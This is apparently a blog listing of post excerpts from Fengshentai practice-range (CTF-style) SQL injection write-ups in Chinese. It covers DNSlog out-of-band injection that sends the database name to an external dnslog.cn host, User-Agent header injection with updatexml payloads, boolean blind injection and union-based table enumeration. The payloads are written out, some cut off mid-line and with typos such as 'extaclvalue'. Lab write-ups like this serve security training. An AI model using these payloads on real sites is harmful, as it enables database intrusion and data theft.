封神台靶场
星星明亮
我是个菜鸡
展开
-
封神台sql靶场 dns_log 注入
前提:目标数据库允许load_file()1 and 1=1 //正常1 and 1=2 //页面错误,存在注入1 and 1=2 union select 1,2 # //回显位为2,由于题目要求用dnslog,那就用联合查询了构造poyload1 and (select load_file('//',(concat(select database()),'.xizusd.dnslog.cn/abc')))1+and+(select+load_file(concat('//',(select+原创 2021-06-25 21:48:16 · 238 阅读 · 0 评论 -
封神台 head注入1-3
可以看到源代码只是对name和password做了过滤,但是全局变量user-agent是可控的 bp抓包修改user-agent头 1' and extaclvalue(1,concat(0x7e,(select database()),1)) and ' 1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),原创 2021-06-25 11:20:38 · 270 阅读 · 0 评论 -
封神台 基础靶场 盲注1-3
第一关1 and 1=1 //正常1 and 1=2 //空,数字型盲注这里为了节约时间,用bp爆破1 and length(database())=12,当前数据库长度为121+and+ascii(substr(database(),1,1))+=107 //第一位为k1+and+ascii(substr(database(),2,1))+=97 //第二位为a1+and+ascii(substr(database(),3,1))+=110 //第二位为n1+and+ascii原创 2021-06-25 10:28:51 · 509 阅读 · 0 评论 -
封神台基础靶场 显错注入1-4
第一题,单双引号没区别,可能不是字符型1 and 1=1 //页面正常1 and 1=2 //页面错误,数字型注入判断列数1 and 1=1 order by 1,2,3 //回显,存在三列。判断回显位1 and 1=2 union select 1,2,3 //23为回显位注出当前数据库1 and 1=2 union select 1,2,(database()) --+注表1 and 1=2 union select 1,2,group_concat(table_name) fro原创 2021-06-24 21:02:53 · 276 阅读 · 0 评论